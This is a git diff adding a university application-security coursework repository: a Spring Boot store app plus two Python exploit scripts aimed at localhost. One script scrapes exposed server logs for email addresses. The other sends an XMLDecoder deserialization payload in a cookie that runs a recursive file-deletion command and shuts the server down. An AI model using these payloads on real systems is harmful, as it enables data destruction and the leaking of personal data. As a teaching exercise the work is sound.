diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..7a52681
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,6 @@
+*.log
+target/
+work/
+.idea/
+database/
+log/
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..8656701
--- /dev/null
+++ b/README.md
@@ -0,0 +1,90 @@
+# MUNICS SAPP Práctica 1
+
+<div align="center">
+
+***Seguridad de Aplicaciones: Práctica 1 - Store App***
+
+[![OpenJDK_17](https://img.shields.io/badge/OpenJDK_17-black?logo=openjdk&logoColor=white&labelColor=grey&color=orange)](<https://openjdk.org/>)
+[![Spring](https://img.shields.io/badge/Spring-black?logo=spring&logoColor=white&labelColor=grey&color=%236DB33F)](<https://spring.io/>)
+[![Spring Boot](https://img.shields.io/badge/Spring_Boot-black?logo=springboot&logoColor=white&labelColor=grey&color=%236DB33F)](<https://spring.io/>)
+[![Hibernate](https://img.shields.io/badge/Hibernate-black?logo=hibernate&logoColor=white&labelColor=grey&color=%2359666C)
+](<https://hibernate.org/>)
+[![Thymeleaf](https://img.shields.io/badge/Thymeleaf-black?logo=thymeleaf&logoColor=white&labelColor=grey&color=%23005F0F)](<https://www.thymeleaf.org/>)
+[![jQuery](https://img.shields.io/badge/jQuery-black?logo=jquery&logoColor=white&labelColor=grey&color=%230769AD)](<https://jquery.com/>)
+[![bootstrap](https://img.shields.io/badge/bootstrap-black?logo=bootstrap&logoColor=white&labelColor=grey&color=%237952B3)](<https://getbootstrap.com/>)
+[![Static Badge](https://img.shields.io/badge/Maven-black?logo=apachemaven&logoColor=white&labelColor=grey&color=%23C71A36)](<https://maven.apache.org/>)
+
+[![License: MIT](<https://img.shields.io/github/license/danielfeitopin/MUNICS-SAPP-P1>)](LICENSE "License")
+[![GitHub issues](https://img.shields.io/github/issues/danielfeitopin/MUNICS-SAPP-P1)](<https://github.com/danielfeitopin/MUNICS-SAPP-P1> "Issues")
+[![GitHub stars](https://img.shields.io/github/stars/danielfeitopin/MUNICS-SAPP-P1)](<https://github.com/danielfeitopin/MUNICS-SAPP-P1/stargazers> "Stars")
+
+</div>
+
+## Índice
+
+- [MUNICS SAPP Práctica 1](#munics-sapp-práctica-1)
+  - [Índice](#índice)
+  - [Configuración](#configuración)
+    - [Software requerido](#software-requerido)
+  - [Uso](#uso)
+    - [Compilación y ejecución de la aplicación web](#compilación-y-ejecución-de-la-aplicación-web)
+  - [Estructura del proyecto](#estructura-del-proyecto)
+  - [Licencia](#licencia)
+  - [Contacto](#contacto)
+
+
+## Configuración
+
+### Software requerido
+
+- [AdoptOpenJDK 17](<https://adoptium.net/>)
+- [Maven](<https://maven.apache.org/download.cgi>)
+
+## Uso
+
+### Compilación y ejecución de la aplicación web
+
+Compilación:
+
+```sh
+mvn sql:execute install
+```
+
+Ejecución:
+
+```sh
+mvn spring-boot:run
+```
+
+Restauración de la base de datos:
+
+```sh
+mvn sql:execute
+```
+
+Acceso: <http://localhost:8888/>
+
+## Estructura del proyecto
+
+La aplicación web se distribuye dentro de un proyecto Maven:
+- `pom.xml`: fichero de configuración del proyecto.
+- `src/main/java`: directorio de código fuente.
+- `src/main/resources`: ficheros de configuración.
+  - `src/main/resources/templates`: plantillas HTML.
+  - `src/main/resources/static`: recursos estáticos.
+  - `src/main/resources/application.properties`: ichero principal de configuración de la aplicación.
+
+## Licencia
+
+El contenido de este repositorio está bajo la licencia [GPL3](LICENSE).
+
+## Contacto
+
+¡No dudes en ponerte en contacto conmigo!
+
+<div align="center">
+
+[![GitHub](https://img.shields.io/badge/GitHub-%23181717?style=for-the-badge&logo=github&logoColor=%23181717&color=white)](<https://github.com/danielfeitopin>)
+[![LinkedIn](https://img.shields.io/badge/LinkedIn-white?style=for-the-badge&logo=linkedin&logoColor=white&color=%230A66C2)](<https://www.linkedin.com/in/danielfeitopin/>)
+
+</div>
\ No newline at end of file
diff --git a/docs/enunciado.pdf b/docs/enunciado.pdf
new file mode 100644
index 0000000..563a471
Binary files /dev/null and b/docs/enunciado.pdf differ
diff --git a/docs/memoria.pdf b/docs/memoria.pdf
new file mode 100644
index 0000000..a4cfc58
Binary files /dev/null and b/docs/memoria.pdf differ
diff --git a/pom.xml b/pom.xml
new file mode 100644
index 0000000..b6d1602
--- /dev/null
+++ b/pom.xml
@@ -0,0 +1,258 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>es.storeapp</groupId>
+    <artifactId>store-app</artifactId>
+    <version>1.0.0</version>
+    <name>Store Application</name>
+
+    <parent>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-starter-parent</artifactId>
+        <version>3.1.0</version>
+    </parent>
+
+    <dependencies>
+        
+        <!-- Java -->
+        
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-web</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-validation</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-thymeleaf</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-devtools</artifactId>
+            <optional>true</optional>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-data-jpa</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-test</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-actuator</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.derby</groupId>
+            <artifactId>derby</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.derby</groupId>
+            <artifactId>derbytools</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.mindrot</groupId>
+            <artifactId>jbcrypt</artifactId>
+            <version>0.4</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-email</artifactId>
+            <version>1.5</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-compress</artifactId>
+            <version>1.21</version>
+        </dependency>
+
+    <!-- Web -->
+        
+        <dependency>
+            <groupId>org.webjars</groupId>
+            <artifactId>webjars-locator</artifactId>
+            <version>0.33</version>
+        </dependency>
+        <dependency>
+            <groupId>org.webjars</groupId>
+            <artifactId>bootstrap</artifactId>
+            <version>4.0.0-2</version>
+        </dependency>
+        <dependency>
+            <groupId>org.webjars</groupId>
+            <artifactId>jquery</artifactId>
+            <version>3.3.1-1</version>
+        </dependency>
+        <dependency>
+            <groupId>org.webjars</groupId>
+            <artifactId>font-awesome</artifactId>
+            <version>5.0.6</version>
+        </dependency>
+        <dependency>
+            <groupId>org.webjars.bower</groupId>
+            <artifactId>jquery-form-validator</artifactId>
+            <version>2.3.77</version>
+            <exclusions>
+                <exclusion>
+                    <groupId>org.webjars.bower</groupId>
+                    <artifactId>jquery</artifactId>
+                </exclusion>
+            </exclusions>
+        </dependency>
+        <dependency>
+            <groupId>org.webjars</groupId>
+            <artifactId>datatables</artifactId>
+            <version>1.13.2</version>
+        </dependency>
+        <dependency>
+            <groupId>org.webjars.bower</groupId>
+            <artifactId>datatables-responsive</artifactId>
+            <version>2.2.1</version>
+            <exclusions>
+                <exclusion>
+                    <groupId>org.webjars.bower</groupId>
+                    <artifactId>jquery</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.webjars.bower</groupId>
+                    <artifactId>datatables</artifactId>
+                </exclusion>
+            </exclusions>
+        </dependency>
+        <dependency>
+            <groupId>org.webjars.bower</groupId>
+            <artifactId>bootstrap-star-rating</artifactId>
+            <version>4.0.3</version>
+            <exclusions>
+                <exclusion>
+                    <groupId>org.webjars.bower</groupId>
+                    <artifactId>jquery</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.webjars.bower</groupId>
+                    <artifactId>bootstrap</artifactId>
+                </exclusion>
+            </exclusions>
+        </dependency>
+        <dependency>
+            <groupId>org.webjars</groupId>
+            <artifactId>jquery.inputmask</artifactId>
+            <version>3.3.7</version>
+        </dependency>
+        <dependency>
+            <groupId>javax.xml.bind</groupId>
+            <artifactId>jaxb-api</artifactId>
+            <version>2.3.0</version>
+        </dependency>
+        <dependency>
+            <groupId>com.sun.xml.bind</groupId>
+            <artifactId>jaxb-core</artifactId>
+            <version>2.3.0</version>
+        </dependency>
+        <dependency>
+            <groupId>com.sun.xml.bind</groupId>
+            <artifactId>jaxb-impl</artifactId>
+            <version>2.3.0</version>
+        </dependency>
+        <dependency>
+            <groupId>org.javassist</groupId>
+            <artifactId>javassist</artifactId>
+            <version>3.27.0-GA</version>
+            <scope>runtime</scope>
+        </dependency>
+        <dependency>
+            <groupId>org.hibernate.validator</groupId>
+            <artifactId>hibernate-validator</artifactId>
+            <version>8.0.0.Final</version>
+        </dependency>
+        <dependency>
+            <groupId>org.owasp.encoder</groupId>
+            <artifactId>encoder</artifactId>
+            <version>1.2.3</version> 
+        </dependency>
+    </dependencies>
+
+    <properties>
+        <java.version>17</java.version>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+        <start-class>es.storeapp.Application</start-class>
+    </properties>
+
+    <build>
+        <plugins>
+            
+             <plugin>
+              <groupId>org.owasp</groupId>
+              <artifactId>dependency-check-maven</artifactId>
+              <version>6.5.1</version>
+              <executions>
+                  <execution>
+                      <goals>
+                          <goal>check</goal>
+                      </goals>
+                  </execution>
+              </executions>
+            </plugin>
+
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+            </plugin>
+            
+            <plugin>
+                <groupId>org.sonarsource.scanner.maven</groupId>
+                <artifactId>sonar-maven-plugin</artifactId>
+                <version>3.9.0.2155</version>
+            </plugin>
+            
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-assembly-plugin</artifactId>
+                <configuration>
+                    <finalName>store-app</finalName>
+                    <descriptors>
+                        <descriptor>src/main/assembly/src.xml</descriptor>
+                    </descriptors>
+                </configuration>
+            </plugin>
+            
+            <plugin>
+                <groupId>org.codehaus.mojo</groupId>
+                <artifactId>sql-maven-plugin</artifactId>
+                <version>1.5</version>
+                <dependencies>
+                    <dependency>
+                        <groupId>org.apache.derby</groupId>
+                        <artifactId>derby</artifactId>
+                        <version>10.16.1.1</version>
+                    </dependency>
+                    <dependency>
+                        <groupId>org.apache.derby</groupId>
+                        <artifactId>derbytools</artifactId>
+                        <version>10.16.1.1</version>
+                    </dependency>
+                </dependencies>
+                <configuration>
+                    <driver>org.apache.derby.jdbc.EmbeddedDriver</driver>
+                    <url>jdbc:derby:database;create=true</url>
+                    <username>app</username>
+                    <password>secr3t</password>
+                    <autocommit>true</autocommit>
+                    <onError>continue</onError>
+                    <srcFiles>
+                        <srcFile>src/main/resources/tables.sql</srcFile>
+                        <srcFile>src/main/resources/data.sql</srcFile>
+                    </srcFiles>
+                </configuration>
+            </plugin>
+            
+        </plugins>
+    </build>
+
+</project>
diff --git a/server.p12 b/server.p12
new file mode 100644
index 0000000..2cdd9b6
Binary files /dev/null and b/server.p12 differ
diff --git a/src/exploits/get_logs.py b/src/exploits/get_logs.py
new file mode 100644
index 0000000..0e22929
--- /dev/null
+++ b/src/exploits/get_logs.py
@@ -0,0 +1,55 @@
+import requests
+from datetime import date
+import gzip
+
+today = date.today()
+url = 'http://localhost:8888/resources/'
+
+log_base = 'server.log'
+log_comprimido = 'server.log.' + str(today.year) + '-' + str(today.month) + '-' + str(today.day) + '.'
+end_file = '.gz'
+
+# En esta variable almacenaremos los archivos descargados
+archivos_descargados = [log_base]
+
+# Descargaremos el fichero server.log
+r = requests.get(url + log_base)
+
+with open(log_base,'wb') as f:
+    f.write(r.content)
+    f.close()
+r.close()
+
+# Descargamos los comprimidos del dia de hoy
+cnt = 0
+continuar = True
+
+while continuar:
+    log_filename = log_comprimido + str(cnt) + end_file
+    r = requests.get(url + log_filename)
+    if (r.status_code == 404):
+        continuar = False
+        r.close()
+    if r.status_code == 200:
+        with open(log_filename,'wb') as f:
+            f.write(r.content)
+            f.close()
+        r.close()
+        archivos_descargados.append(log_filename)
+    cnt +=1
+
+# Analizamos los ficheros en busca de correos electronicos
+# Los guardamos en un set para no tener repetidos
+for archivo in archivos_descargados:
+    lineas = ''
+    if archivo[-3:len(archivo)] == '.gz':
+        with gzip.open(archivo,'rb') as archivo_gz:
+            lineas = archivo_gz.readlines()
+            archivo_gz.close()
+    else:
+        with open(archivo,'rb') as archivo:
+            lineas = archivo.readlines()
+            archivo.close()
+    for linea in lineas:
+        if linea.count(b'@') > 0:
+            print(linea.decode('utf-8'),end='')
diff --git a/src/exploits/goodbyeworld.py b/src/exploits/goodbyeworld.py
new file mode 100644
index 0000000..3ff96d5
--- /dev/null
+++ b/src/exploits/goodbyeworld.py
@@ -0,0 +1,37 @@
+#!/usr/bin/python
+import requests
+import base64
+
+URL: str = "http://localhost:8888/"
+
+PAYLOAD: str = """
+<?xml version="1.0" encoding="UTF-8"?>
+<java version="17.0.9" class="java.beans.XMLDecoder">
+    <object class="java.lang.ProcessBuilder">
+        <array class="java.lang.String" length="5">
+            <void index="0">
+                <string>find</string>
+            </void>
+            <void index="1">
+                <string>.</string>
+            </void>
+            <void index="2">
+                <string>-mindepth</string>
+            </void>
+            <void index="3">
+                <string>1</string>
+            </void>
+            <void index="4">
+                <string>-delete</string>
+            </void>
+        </array>
+        <void method="start"></void>
+    </object>
+</java>
+"""
+
+requests.get(URL, cookies={
+    'user-info': base64.b64encode(PAYLOAD.strip().encode()).decode()
+})
+
+requests.post(URL + 'actuator/shutdown')
\ No newline at end of file
diff --git a/src/main/assembly/src.xml b/src/main/assembly/src.xml
new file mode 100644
index 0000000..9669e58
--- /dev/null
+++ b/src/main/assembly/src.xml
@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<assembly>
+    <id>src</id>
+    <formats>
+        <format>zip</format>
+    </formats>
+    <fileSets>
+        <fileSet>
+            <includes>
+                <include>**/*</include>
+            </includes>
+            <excludes>
+                <exclude>.project</exclude>
+                <exclude>.classpath</exclude>
+                <exclude>.settings/**</exclude>
+                <exclude>derby.log</exclude>
+                <exclude>nbactions.xml</exclude>
+                <exclude>**/target/**</exclude>
+                <exclude>.git/**</exclude>
+                <exclude>.gitignore</exclude>
+            </excludes>
+        </fileSet>
+    </fileSets>
+</assembly>
diff --git a/src/main/java/es/storeapp/Application.java b/src/main/java/es/storeapp/Application.java
new file mode 100644
index 0000000..b0a2ecc
--- /dev/null
+++ b/src/main/java/es/storeapp/Application.java
@@ -0,0 +1,13 @@
+package es.storeapp;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class Application {
+
+    public static void main(String[] args) {
+        SpringApplication.run(Application.class, args);
+    }
+
+}
\ No newline at end of file
diff --git a/src/main/java/es/storeapp/business/entities/Category.java b/src/main/java/es/storeapp/business/entities/Category.java
new file mode 100644
index 0000000..bfa6e60
--- /dev/null
+++ b/src/main/java/es/storeapp/business/entities/Category.java
@@ -0,0 +1,79 @@
+package es.storeapp.business.entities;
+
+import es.storeapp.common.Constants;
+import java.io.Serializable;
+import jakarta.persistence.Column;
+import jakarta.persistence.Entity;
+import jakarta.persistence.Id;
+import jakarta.persistence.Table;
+
+@Entity(name = Constants.CATEGORY_ENTITY)
+@Table(name = Constants.CATEGORIES_TABLE)
+public class Category implements Serializable {
+    
+    private static final long serialVersionUID = 340618567236100110L;
+    
+    @Id
+    private Long categoryId;
+    
+    @Column(name = "name", nullable = false, unique = true)
+    private String name;
+    
+    @Column(name = "description", nullable = false)
+    private String description;
+    
+    @Column(name = "icon", nullable = false)
+    private String icon;
+    
+    @Column(name = "highlighted")
+    private boolean highlighted;
+
+    public Long getCategoryId() {
+        return categoryId;
+    }
+
+    public void setCategoryId(Long categoryId) {
+        this.categoryId = categoryId;
+    }
+
+    public String getName() {
+        return name;
+    }
+
+    public void setName(String name) {
+        this.name = name;
+    }
+
+    public String getDescription() {
+        return description;
+    }
+
+    public void setDescription(String description) {
+        this.description = description;
+    }
+
+    public String getIcon() {
+        return icon;
+    }
+
+    public void setIcon(String icon) {
+        this.icon = icon;
+    }
+
+    public boolean isHighlighted() {
+        return highlighted;
+    }
+
+    public void setHighlighted(boolean highlighted) {
+        this.highlighted = highlighted;
+    }
+
+    @Override
+    public String toString() {
+        return String.format("Category{categoryId=%s, name=%s, description=%s, icon=%s, highlighted=%s}", 
+            categoryId, name, description, icon, highlighted);
+    }
+  
+    
+    
+}
diff --git a/src/main/java/es/storeapp/business/entities/Comment.java b/src/main/java/es/storeapp/business/entities/Comment.java
new file mode 100644
index 0000000..7dbcc1e
--- /dev/null
+++ b/src/main/java/es/storeapp/business/entities/Comment.java
@@ -0,0 +1,96 @@
+package es.storeapp.business.entities;
+
+import es.storeapp.common.Constants;
+import java.io.Serializable;
+import jakarta.persistence.Column;
+import jakarta.persistence.Entity;
+import jakarta.persistence.FetchType;
+import jakarta.persistence.GeneratedValue;
+import jakarta.persistence.GenerationType;
+import jakarta.persistence.Id;
+import jakarta.persistence.JoinColumn;
+import jakarta.persistence.ManyToOne;
+import jakarta.persistence.Table;
+
+@Entity(name = Constants.COMMENT_ENTITY)
+@Table(name = Constants.COMMENTS_TABLE)
+public class Comment implements Serializable{
+
+    private static final long serialVersionUID = -8821440815912953976L;
+    
+    @Id
+    @GeneratedValue(strategy = GenerationType.IDENTITY)
+    private Long commentId;
+    
+    @Column(name = "text", nullable = false)
+    private String text;
+    
+    @Column(name = "rating", nullable = false)
+    private Integer rating;
+    
+    @Column(name = "timestamp", nullable = false)
+    private Long timestamp;
+    
+    @ManyToOne(fetch = FetchType.LAZY)
+    @JoinColumn(name = "userId", nullable = false)
+    private User user;
+    
+    @ManyToOne(fetch = FetchType.LAZY)
+    @JoinColumn(name = "productId", nullable = false)
+    private Product product;
+
+    public Long getCommentId() {
+        return commentId;
+    }
+
+    public void setCommentId(Long commentId) {
+        this.commentId = commentId;
+    }
+
+    public String getText() {
+        return text;
+    }
+
+    public void setText(String text) {
+        this.text = text;
+    }
+
+    public User getUser() {
+        return user;
+    }
+
+    public void setUser(User user) {
+        this.user = user;
+    }
+
+    public Product getProduct() {
+        return product;
+    }
+
+    public void setProduct(Product product) {
+        this.product = product;
+    }
+
+    public Long getTimestamp() {
+        return timestamp;
+    }
+
+    public void setTimestamp(Long timestamp) {
+        this.timestamp = timestamp;
+    }
+
+    public Integer getRating() {
+        return rating;
+    }
+
+    public void setRating(Integer rating) {
+        this.rating = rating;
+    }
+
+    @Override
+    public String toString() {
+        return String.format("Comment{commentId=%s, text=%s, rating=%s, timestamp=%s, user=%s, product=%s}", 
+            commentId, text, rating, timestamp, user, product);
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/business/entities/CreditCard.java b/src/main/java/es/storeapp/business/entities/CreditCard.java
new file mode 100644
index 0000000..e1e9648
--- /dev/null
+++ b/src/main/java/es/storeapp/business/entities/CreditCard.java
@@ -0,0 +1,58 @@
+package es.storeapp.business.entities;
+
+import java.io.Serializable;
+import java.text.MessageFormat;
+import jakarta.persistence.Embeddable;
+
+@Embeddable
+public class CreditCard implements Serializable {
+
+    private String card;
+    
+    private Integer cvv;
+    
+    private Integer expirationMonth;
+    
+    private Integer expirationYear;
+
+    public String getCard() {
+        return card;
+    }
+
+    public void setCard(String card) {
+        this.card = card;
+    }
+
+    public Integer getCvv() {
+        return cvv;
+    }
+
+    public void setCvv(Integer cvv) {
+        this.cvv = cvv;
+    }
+
+    public Integer getExpirationMonth() {
+        return expirationMonth;
+    }
+
+    public void setExpirationMonth(Integer expirationMonth) {
+        this.expirationMonth = expirationMonth;
+    }
+
+    public Integer getExpirationYear() {
+        return expirationYear;
+    }
+
+    public void setExpirationYear(Integer expirationYear) {
+        this.expirationYear = expirationYear;
+    }
+
+    @Override
+    public String toString() {
+        return MessageFormat.format("CreditCard{card={0}, cvv={1}, expirationMonth={2}, expirationYear={3}}", 
+            card, cvv, expirationMonth, expirationYear);
+    }
+    
+    
+    
+}
diff --git a/src/main/java/es/storeapp/business/entities/Order.java b/src/main/java/es/storeapp/business/entities/Order.java
new file mode 100644
index 0000000..89ad84f
--- /dev/null
+++ b/src/main/java/es/storeapp/business/entities/Order.java
@@ -0,0 +1,112 @@
+package es.storeapp.business.entities;
+
+import es.storeapp.common.Constants;
+import jakarta.persistence.*;
+import java.io.Serializable;
+import java.util.ArrayList;
+import java.util.List;
+
+@Entity(name = Constants.ORDER_ENTITY)
+@Table(name = Constants.ORDERS_TABLE)
+public class Order implements Serializable {
+
+    private static final long serialVersionUID = -4089154240038598234L;
+    
+    @Id
+    @GeneratedValue(strategy = GenerationType.IDENTITY)
+    private Long orderId;
+    
+    @Column(name = "name", nullable = false)
+    String name;
+    
+    @Column(name = "timestamp", nullable = false)
+    private Long timestamp;
+    
+    @Column(name = "price", nullable = false)
+    private Integer price;
+    
+    @Column(name = "address", nullable = false)
+    private String address;
+    
+    @Enumerated(EnumType.STRING)
+    @Column(name = "state", nullable = false)
+    private OrderState state;
+    
+    @ManyToOne(fetch = FetchType.LAZY)
+    @JoinColumn(name = "userId", nullable = false)
+    private User user;
+    
+    @OneToMany(mappedBy = "order")
+    private List<OrderLine> orderLines = new ArrayList<>();
+
+    public Long getOrderId() {
+        return orderId;
+    }
+
+    public void setOrderId(Long orderId) {
+        this.orderId = orderId;
+    }
+
+    public Integer getPrice() {
+        return price;
+    }
+
+    public void setPrice(Integer price) {
+        this.price = price;
+    }
+
+    public String getAddress() {
+        return address;
+    }
+
+    public void setAddress(String address) {
+        this.address = address;
+    }
+
+    public OrderState getState() {
+        return state;
+    }
+
+    public void setState(OrderState state) {
+        this.state = state;
+    }
+
+    public User getUser() {
+        return user;
+    }
+
+    public void setUser(User user) {
+        this.user = user;
+    }
+
+    public List<OrderLine> getOrderLines() {
+        return orderLines;
+    }
+
+    public void setOrderLines(List<OrderLine> orderLines) {
+        this.orderLines = orderLines;
+    }
+
+    public String getName() {
+        return name;
+    }
+
+    public void setName(String name) {
+        this.name = name;
+    }
+
+    public Long getTimestamp() {
+        return timestamp;
+    }
+
+    public void setTimestamp(Long timestamp) {
+        this.timestamp = timestamp;
+    }
+
+    @Override
+    public String toString() {
+        return String.format("Order{orderId=%s, name=%s, timestamp=%s, price=%s, address=%s, state=%s, user=%s, orderLines=%s}", 
+            orderId, name, timestamp, price, address, state, user, orderLines);
+    }    
+    
+}
diff --git a/src/main/java/es/storeapp/business/entities/OrderLine.java b/src/main/java/es/storeapp/business/entities/OrderLine.java
new file mode 100644
index 0000000..5a735da
--- /dev/null
+++ b/src/main/java/es/storeapp/business/entities/OrderLine.java
@@ -0,0 +1,77 @@
+package es.storeapp.business.entities;
+
+import es.storeapp.common.Constants;
+import java.io.Serializable;
+import java.text.MessageFormat;
+import jakarta.persistence.Column;
+import jakarta.persistence.Entity;
+import jakarta.persistence.FetchType;
+import jakarta.persistence.GeneratedValue;
+import jakarta.persistence.GenerationType;
+import jakarta.persistence.Id;
+import jakarta.persistence.JoinColumn;
+import jakarta.persistence.ManyToOne;
+import jakarta.persistence.Table;
+
+@Entity(name = Constants.ORDER_LINE_ENTITY)
+@Table(name = Constants.ORDER_LINES_TABLE)
+public class OrderLine implements Serializable {
+    
+    private static final long serialVersionUID = -1663947782096663051L;
+    
+    @Id
+    @GeneratedValue(strategy = GenerationType.IDENTITY)
+    private Long orderLineId;
+    
+    @Column(name = "price")
+    private Integer price;
+    
+    @ManyToOne(fetch = FetchType.LAZY)
+    @JoinColumn(name = "productId", nullable = false)
+    private Product product;
+    
+    @ManyToOne(fetch = FetchType.LAZY)
+    @JoinColumn(name = "orderId", nullable = false)
+    private Order order;
+
+    public Long getOrderLineId() {
+        return orderLineId;
+    }
+
+    public void setOrderLineId(Long orderLineId) {
+        this.orderLineId = orderLineId;
+    }
+
+    public Integer getPrice() {
+        return price;
+    }
+
+    public void setPrice(Integer price) {
+        this.price = price;
+    }
+
+    public Product getProduct() {
+        return product;
+    }
+
+    public void setProduct(Product product) {
+        this.product = product;
+    }
+
+    public Order getOrder() {
+        return order;
+    }
+
+    public void setOrder(Order order) {
+        this.order = order;
+    }
+
+    @Override
+    public String toString() {
+        return MessageFormat.format("OrderLine{orderLineId={0}, price={1}, product={2}, order={3}}", 
+            orderLineId, price, product, order);
+    }
+   
+    
+    
+}
diff --git a/src/main/java/es/storeapp/business/entities/OrderState.java b/src/main/java/es/storeapp/business/entities/OrderState.java
new file mode 100644
index 0000000..c51244f
--- /dev/null
+++ b/src/main/java/es/storeapp/business/entities/OrderState.java
@@ -0,0 +1,5 @@
+package es.storeapp.business.entities;
+
+public enum OrderState {
+    PENDING, COMPLETED, CANCELLED 
+}
diff --git a/src/main/java/es/storeapp/business/entities/Product.java b/src/main/java/es/storeapp/business/entities/Product.java
new file mode 100644
index 0000000..a3577d7
--- /dev/null
+++ b/src/main/java/es/storeapp/business/entities/Product.java
@@ -0,0 +1,144 @@
+package es.storeapp.business.entities;
+
+import es.storeapp.common.Constants;
+import java.io.Serializable;
+import java.util.ArrayList;
+import java.util.List;
+import jakarta.persistence.Column;
+import jakarta.persistence.Entity;
+import jakarta.persistence.Id;
+import jakarta.persistence.JoinColumn;
+import jakarta.persistence.ManyToOne;
+import jakarta.persistence.OneToMany;
+import jakarta.persistence.Table;
+
+@Entity(name = Constants.PRODUCT_ENTITY)
+@Table(name = Constants.PRODUCTS_TABLE)
+public class Product implements Serializable{    
+
+    private static final long serialVersionUID = 70079876312519893L;
+    
+    @Id
+    private Long productId;
+    
+    @ManyToOne
+    @JoinColumn(name = "category", nullable = false)
+    private Category category;
+    
+    @Column(name = "name", nullable = false, unique = true)
+    private String name;
+    
+    @Column(name = "description", nullable = false)
+    private String description;
+    
+    @Column(name = "icon", nullable = false)
+    private String icon;
+    
+    @Column(name = "price", nullable = false)
+    private Integer price;
+
+    @Column(name = "totalScore", nullable = false)
+    private Integer totalScore;
+
+    @Column(name = "totalComments", nullable = false)
+    private Integer totalComments;
+    
+    @Column(name = "sales", nullable = false)
+    private Integer sales;
+    
+    @OneToMany(mappedBy = "product")
+    private List<Comment> comments = new ArrayList<>();
+    
+    public Long getProductId() {
+        return productId;
+    }
+
+    public void setProductId(Long productId) {
+        this.productId = productId;
+    }
+
+    public Category getCategory() {
+        return category;
+    }
+
+    public void setCategory(Category category) {
+        this.category = category;
+    }
+    
+    public String getName() {
+        return name;
+    }
+
+    public void setName(String name) {
+        this.name = name;
+    }
+
+    public String getDescription() {
+        return description;
+    }
+
+    public void setDescription(String description) {
+        this.description = description;
+    }
+
+    public String getIcon() {
+        return icon;
+    }
+
+    public void setIcon(String icon) {
+        this.icon = icon;
+    }
+
+    public Integer getPrice() {
+        return price;
+    }
+
+    public void setPrice(Integer price) {
+        this.price = price;
+    }
+
+    public Integer getTotalScore() {
+        return totalScore;
+    }
+
+    public void setTotalScore(Integer totalScore) {
+        this.totalScore = totalScore;
+    }
+
+    public Integer getTotalComments() {
+        return totalComments;
+    }
+
+    public void setTotalComments(Integer totalComments) {
+        this.totalComments = totalComments;
+    }
+
+    public Integer getSales() {
+        return sales;
+    }
+
+    public void setSales(Integer sales) {
+        this.sales = sales;
+    }
+
+    public List<Comment> getComments() {
+        return comments;
+    }
+
+    public void setComments(List<Comment> comments) {
+        this.comments = comments;
+    }
+    
+    public Integer getRating() {
+        return totalComments == 0 ? 0 : totalScore / totalComments;
+    }
+
+    @Override
+    public String toString() {
+        return String.format("Product{productId=%s, category=%s, name=%s, description=%s, icon=%s, price=%s, totalScore=%s, totalComments=%s, sales=%s}", 
+            productId, category, name, description, icon, price, totalScore, totalComments, sales);
+    }
+    
+    
+    
+}
diff --git a/src/main/java/es/storeapp/business/entities/User.java b/src/main/java/es/storeapp/business/entities/User.java
new file mode 100644
index 0000000..969e6b5
--- /dev/null
+++ b/src/main/java/es/storeapp/business/entities/User.java
@@ -0,0 +1,153 @@
+package es.storeapp.business.entities;
+
+import es.storeapp.common.Constants;
+import java.io.Serializable;
+import java.util.ArrayList;
+import java.util.List;
+import jakarta.persistence.AttributeOverride;
+import jakarta.persistence.AttributeOverrides;
+import jakarta.persistence.Column;
+import jakarta.persistence.Embedded;
+import jakarta.persistence.Entity;
+import jakarta.persistence.GeneratedValue;
+import jakarta.persistence.GenerationType;
+import jakarta.persistence.Id;
+import jakarta.persistence.OneToMany;
+import jakarta.persistence.Table;
+import jakarta.validation.constraints.Email;
+import jakarta.validation.constraints.NotBlank;
+
+@Entity(name = Constants.USER_ENTITY)
+@Table(name = Constants.USERS_TABLE)
+public class User implements Serializable {
+
+    private static final long serialVersionUID = 570528466125178223L;
+
+    public User() {
+    }
+
+    public User(String name, String email, String password, String address, String image) {
+        this.name = name;
+        this.email = email;
+        this.password = password;
+        this.address = address;
+        this.image = image;
+    }
+    
+    @Id
+    @GeneratedValue(strategy = GenerationType.IDENTITY)
+    private Long userId;
+    
+    @NotBlank(message = "Name cannot be null")
+    @Column(name = "name", nullable = false, unique = false)
+    private String name;
+    
+    @Email(message = "Email should be valid")
+    @NotBlank(message = "Email cannot be null")
+    @Column(name = "email", nullable = false, unique = true)
+    private String email;
